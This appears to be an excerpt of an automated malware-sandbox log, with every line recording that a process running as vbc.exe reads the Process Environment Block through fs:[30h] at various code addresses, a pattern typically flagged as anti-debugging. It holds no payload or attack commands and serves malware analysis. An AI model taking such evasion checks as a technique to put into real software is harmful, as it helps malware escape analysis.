Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056E2581 mov eax, dword ptr fs:[00000030h]		4_2_056E2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056EFD9B mov eax, dword ptr fs:[00000030h]		4_2_056EFD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056EFD9B mov eax, dword ptr fs:[00000030h]		4_2_056EFD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056D746D mov eax, dword ptr fs:[00000030h]		4_2_056D746D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0574C450 mov eax, dword ptr fs:[00000030h]		4_2_0574C450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0574C450 mov eax, dword ptr fs:[00000030h]		4_2_0574C450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056EA44B mov eax, dword ptr fs:[00000030h]		4_2_056EA44B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056EBC2C mov eax, dword ptr fs:[00000030h]		4_2_056EBC2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05771C06 mov eax, dword ptr fs:[00000030h]		4_2_05771C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05771C06 mov eax, dword ptr fs:[00000030h]		4_2_05771C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05771C06 mov eax, dword ptr fs:[00000030h]		4_2_05771C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05771C06 mov eax, dword ptr fs:[00000030h]		4_2_05771C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05771C06 mov eax, dword ptr fs:[00000030h]		4_2_05771C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05771C06 mov eax, dword ptr fs:[00000030h]		4_2_05771C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05771C06 mov eax, dword ptr fs:[00000030h]		4_2_05771C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05771C06 mov eax, dword ptr fs:[00000030h]		4_2_05771C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05771C06 mov eax, dword ptr fs:[00000030h]		4_2_05771C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05771C06 mov eax, dword ptr fs:[00000030h]		4_2_05771C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05771C06 mov eax, dword ptr fs:[00000030h]		4_2_05771C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05771C06 mov eax, dword ptr fs:[00000030h]		4_2_05771C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05771C06 mov eax, dword ptr fs:[00000030h]		4_2_05771C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05771C06 mov eax, dword ptr fs:[00000030h]		4_2_05771C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0578740D mov eax, dword ptr fs:[00000030h]		4_2_0578740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0578740D mov eax, dword ptr fs:[00000030h]		4_2_0578740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0578740D mov eax, dword ptr fs:[00000030h]		4_2_0578740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05736C0A mov eax, dword ptr fs:[00000030h]		4_2_05736C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05736C0A mov eax, dword ptr fs:[00000030h]		4_2_05736C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05736C0A mov eax, dword ptr fs:[00000030h]		4_2_05736C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05736C0A mov eax, dword ptr fs:[00000030h]		4_2_05736C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05736CF0 mov eax, dword ptr fs:[00000030h]		4_2_05736CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05736CF0 mov eax, dword ptr fs:[00000030h]		4_2_05736CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05736CF0 mov eax, dword ptr fs:[00000030h]		4_2_05736CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_057714FB mov eax, dword ptr fs:[00000030h]		4_2_057714FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05788CD6 mov eax, dword ptr fs:[00000030h]		4_2_05788CD6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056C849B mov eax, dword ptr fs:[00000030h]		4_2_056C849B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056CFF60 mov eax, dword ptr fs:[00000030h]		4_2_056CFF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05788F6A mov eax, dword ptr fs:[00000030h]		4_2_05788F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056CEF40 mov eax, dword ptr fs:[00000030h]		4_2_056CEF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056B4F2E mov eax, dword ptr fs:[00000030h]		4_2_056B4F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056B4F2E mov eax, dword ptr fs:[00000030h]		4_2_056B4F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056EE730 mov eax, dword ptr fs:[00000030h]		4_2_056EE730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056EA70E mov eax, dword ptr fs:[00000030h]		4_2_056EA70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056EA70E mov eax, dword ptr fs:[00000030h]		4_2_056EA70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0574FF10 mov eax, dword ptr fs:[00000030h]		4_2_0574FF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0574FF10 mov eax, dword ptr fs:[00000030h]		4_2_0574FF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0578070D mov eax, dword ptr fs:[00000030h]		4_2_0578070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0578070D mov eax, dword ptr fs:[00000030h]		4_2_0578070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056DF716 mov eax, dword ptr fs:[00000030h]		4_2_056DF716
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056F37F5 mov eax, dword ptr fs:[00000030h]		4_2_056F37F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05737794 mov eax, dword ptr fs:[00000030h]		4_2_05737794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05737794 mov eax, dword ptr fs:[00000030h]		4_2_05737794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05737794 mov eax, dword ptr fs:[00000030h]		4_2_05737794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056C8794 mov eax, dword ptr fs:[00000030h]		4_2_056C8794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056C766D mov eax, dword ptr fs:[00000030h]		4_2_056C766D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056DAE73 mov eax, dword ptr fs:[00000030h]		4_2_056DAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056DAE73 mov eax, dword ptr fs:[00000030h]		4_2_056DAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056DAE73 mov eax, dword ptr fs:[00000030h]		4_2_056DAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056DAE73 mov eax, dword ptr fs:[00000030h]		4_2_056DAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056DAE73 mov eax, dword ptr fs:[00000030h]		4_2_056DAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056C7E41 mov eax, dword ptr fs:[00000030h]		4_2_056C7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056C7E41 mov eax, dword ptr fs:[00000030h]		4_2_056C7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056C7E41 mov eax, dword ptr fs:[00000030h]		4_2_056C7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056C7E41 mov eax, dword ptr fs:[00000030h]		4_2_056C7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056C7E41 mov eax, dword ptr fs:[00000030h]		4_2_056C7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056C7E41 mov eax, dword ptr fs:[00000030h]		4_2_056C7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0577AE44 mov eax, dword ptr fs:[00000030h]		4_2_0577AE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0577AE44 mov eax, dword ptr fs:[00000030h]		4_2_0577AE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0576FE3F mov eax, dword ptr fs:[00000030h]		4_2_0576FE3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056BE620 mov eax, dword ptr fs:[00000030h]		4_2_056BE620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056BC600 mov eax, dword ptr fs:[00000030h]		4_2_056BC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056BC600 mov eax, dword ptr fs:[00000030h]		4_2_056BC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056BC600 mov eax, dword ptr fs:[00000030h]		4_2_056BC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056E8E00 mov eax, dword ptr fs:[00000030h]		4_2_056E8E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056EA61C mov eax, dword ptr fs:[00000030h]		4_2_056EA61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056EA61C mov eax, dword ptr fs:[00000030h]		4_2_056EA61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05771608 mov eax, dword ptr fs:[00000030h]		4_2_05771608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056E16E0 mov ecx, dword ptr fs:[00000030h]		4_2_056E16E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056C76E2 mov eax, dword ptr fs:[00000030h]		4_2_056C76E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056E36CC mov eax, dword ptr fs:[00000030h]		4_2_056E36CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056F8EC7 mov eax, dword ptr fs:[00000030h]		4_2_056F8EC7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05788ED6 mov eax, dword ptr fs:[00000030h]		4_2_05788ED6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0576FEC0 mov eax, dword ptr fs:[00000030h]		4_2_0576FEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_057346A7 mov eax, dword ptr fs:[00000030h]		4_2_057346A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05780EA5 mov eax, dword ptr fs:[00000030h]		4_2_05780EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05780EA5 mov eax, dword ptr fs:[00000030h]		4_2_05780EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05780EA5 mov eax, dword ptr fs:[00000030h]		4_2_05780EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0574FE87 mov eax, dword ptr fs:[00000030h]		4_2_0574FE87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056BC962 mov eax, dword ptr fs:[00000030h]		4_2_056BC962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056BB171 mov eax, dword ptr fs:[00000030h]		4_2_056BB171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056BB171 mov eax, dword ptr fs:[00000030h]		4_2_056BB171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056DB944 mov eax, dword ptr fs:[00000030h]		4_2_056DB944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056DB944 mov eax, dword ptr fs:[00000030h]		4_2_056DB944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056D4120 mov eax, dword ptr fs:[00000030h]		4_2_056D4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056D4120 mov eax, dword ptr fs:[00000030h]		4_2_056D4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056D4120 mov eax, dword ptr fs:[00000030h]		4_2_056D4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056D4120 mov eax, dword ptr fs:[00000030h]		4_2_056D4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056D4120 mov ecx, dword ptr fs:[00000030h]		4_2_056D4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056E513A mov eax, dword ptr fs:[00000030h]		4_2_056E513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056E513A mov eax, dword ptr fs:[00000030h]		4_2_056E513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056B9100 mov eax, dword ptr fs:[00000030h]		4_2_056B9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056B9100 mov eax, dword ptr fs:[00000030h]		4_2_056B9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056B9100 mov eax, dword ptr fs:[00000030h]		4_2_056B9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056BB1E1 mov eax, dword ptr fs:[00000030h]		4_2_056BB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056BB1E1 mov eax, dword ptr fs:[00000030h]		4_2_056BB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056BB1E1 mov eax, dword ptr fs:[00000030h]		4_2_056BB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_057441E8 mov eax, dword ptr fs:[00000030h]		4_2_057441E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_057351BE mov eax, dword ptr fs:[00000030h]		4_2_057351BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_057351BE mov eax, dword ptr fs:[00000030h]		4_2_057351BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_057351BE mov eax, dword ptr fs:[00000030h]		4_2_057351BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_057351BE mov eax, dword ptr fs:[00000030h]		4_2_057351BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056E61A0 mov eax, dword ptr fs:[00000030h]		4_2_056E61A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056E61A0 mov eax, dword ptr fs:[00000030h]		4_2_056E61A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056D99BF mov ecx, dword ptr fs:[00000030h]		4_2_056D99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056D99BF mov ecx, dword ptr fs:[00000030h]		4_2_056D99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056D99BF mov eax, dword ptr fs:[00000030h]		4_2_056D99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056D99BF mov ecx, dword ptr fs:[00000030h]		4_2_056D99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056D99BF mov ecx, dword ptr fs:[00000030h]		4_2_056D99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056D99BF mov eax, dword ptr fs:[00000030h]		4_2_056D99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056D99BF mov ecx, dword ptr fs:[00000030h]		4_2_056D99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056D99BF mov ecx, dword ptr fs:[00000030h]		4_2_056D99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056D99BF mov eax, dword ptr fs:[00000030h]		4_2_056D99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056D99BF mov ecx, dword ptr fs:[00000030h]		4_2_056D99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056D99BF mov ecx, dword ptr fs:[00000030h]		4_2_056D99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056D99BF mov eax, dword ptr fs:[00000030h]		4_2_056D99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_057749A4 mov eax, dword ptr fs:[00000030h]		4_2_057749A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_057749A4 mov eax, dword ptr fs:[00000030h]		4_2_057749A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_057749A4 mov eax, dword ptr fs:[00000030h]		4_2_057749A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_057749A4 mov eax, dword ptr fs:[00000030h]		4_2_057749A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_057369A6 mov eax, dword ptr fs:[00000030h]		4_2_057369A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056EA185 mov eax, dword ptr fs:[00000030h]		4_2_056EA185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056DC182 mov eax, dword ptr fs:[00000030h]		4_2_056DC182
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056E2990 mov eax, dword ptr fs:[00000030h]		4_2_056E2990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05772073 mov eax, dword ptr fs:[00000030h]		4_2_05772073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05781074 mov eax, dword ptr fs:[00000030h]		4_2_05781074
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056D0050 mov eax, dword ptr fs:[00000030h]		4_2_056D0050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056D0050 mov eax, dword ptr fs:[00000030h]		4_2_056D0050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056E002D mov eax, dword ptr fs:[00000030h]		4_2_056E002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056E002D mov eax, dword ptr fs:[00000030h]		4_2_056E002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056E002D mov eax, dword ptr fs:[00000030h]		4_2_056E002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056E002D mov eax, dword ptr fs:[00000030h]		4_2_056E002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056E002D mov eax, dword ptr fs:[00000030h]		4_2_056E002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056CB02A mov eax, dword ptr fs:[00000030h]		4_2_056CB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056CB02A mov eax, dword ptr fs:[00000030h]		4_2_056CB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056CB02A mov eax, dword ptr fs:[00000030h]		4_2_056CB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056CB02A mov eax, dword ptr fs:[00000030h]		4_2_056CB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056DA830 mov eax, dword ptr fs:[00000030h]		4_2_056DA830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056DA830 mov eax, dword ptr fs:[00000030h]		4_2_056DA830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056DA830 mov eax, dword ptr fs:[00000030h]		4_2_056DA830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056DA830 mov eax, dword ptr fs:[00000030h]		4_2_056DA830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05737016 mov eax, dword ptr fs:[00000030h]		4_2_05737016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05737016 mov eax, dword ptr fs:[00000030h]		4_2_05737016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05737016 mov eax, dword ptr fs:[00000030h]		4_2_05737016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05784015 mov eax, dword ptr fs:[00000030h]		4_2_05784015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05784015 mov eax, dword ptr fs:[00000030h]		4_2_05784015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056B58EC mov eax, dword ptr fs:[00000030h]		4_2_056B58EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056DB8E4 mov eax, dword ptr fs:[00000030h]		4_2_056DB8E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056DB8E4 mov eax, dword ptr fs:[00000030h]		4_2_056DB8E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056B40E1 mov eax, dword ptr fs:[00000030h]		4_2_056B40E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056B40E1 mov eax, dword ptr fs:[00000030h]		4_2_056B40E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056B40E1 mov eax, dword ptr fs:[00000030h]		4_2_056B40E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0574B8D0 mov eax, dword ptr fs:[00000030h]		4_2_0574B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0574B8D0 mov ecx, dword ptr fs:[00000030h]		4_2_0574B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0574B8D0 mov eax, dword ptr fs:[00000030h]		4_2_0574B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0574B8D0 mov eax, dword ptr fs:[00000030h]		4_2_0574B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0574B8D0 mov eax, dword ptr fs:[00000030h]		4_2_0574B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_0574B8D0 mov eax, dword ptr fs:[00000030h]		4_2_0574B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056F90AF mov eax, dword ptr fs:[00000030h]		4_2_056F90AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056E20A0 mov eax, dword ptr fs:[00000030h]		4_2_056E20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056E20A0 mov eax, dword ptr fs:[00000030h]		4_2_056E20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056E20A0 mov eax, dword ptr fs:[00000030h]		4_2_056E20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056E20A0 mov eax, dword ptr fs:[00000030h]		4_2_056E20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056E20A0 mov eax, dword ptr fs:[00000030h]		4_2_056E20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056E20A0 mov eax, dword ptr fs:[00000030h]		4_2_056E20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056EF0BF mov ecx, dword ptr fs:[00000030h]		4_2_056EF0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056EF0BF mov eax, dword ptr fs:[00000030h]		4_2_056EF0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056EF0BF mov eax, dword ptr fs:[00000030h]		4_2_056EF0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056B9080 mov eax, dword ptr fs:[00000030h]		4_2_056B9080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05733884 mov eax, dword ptr fs:[00000030h]		4_2_05733884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05733884 mov eax, dword ptr fs:[00000030h]		4_2_05733884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056BDB60 mov ecx, dword ptr fs:[00000030h]		4_2_056BDB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056E3B7A mov eax, dword ptr fs:[00000030h]		4_2_056E3B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_056E3B7A mov eax, dword ptr fs:[00000030h]		4_2_056E3B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4_2_05788B58 mov eax, dword ptr fs:[00000030h]		4_2_05788B58
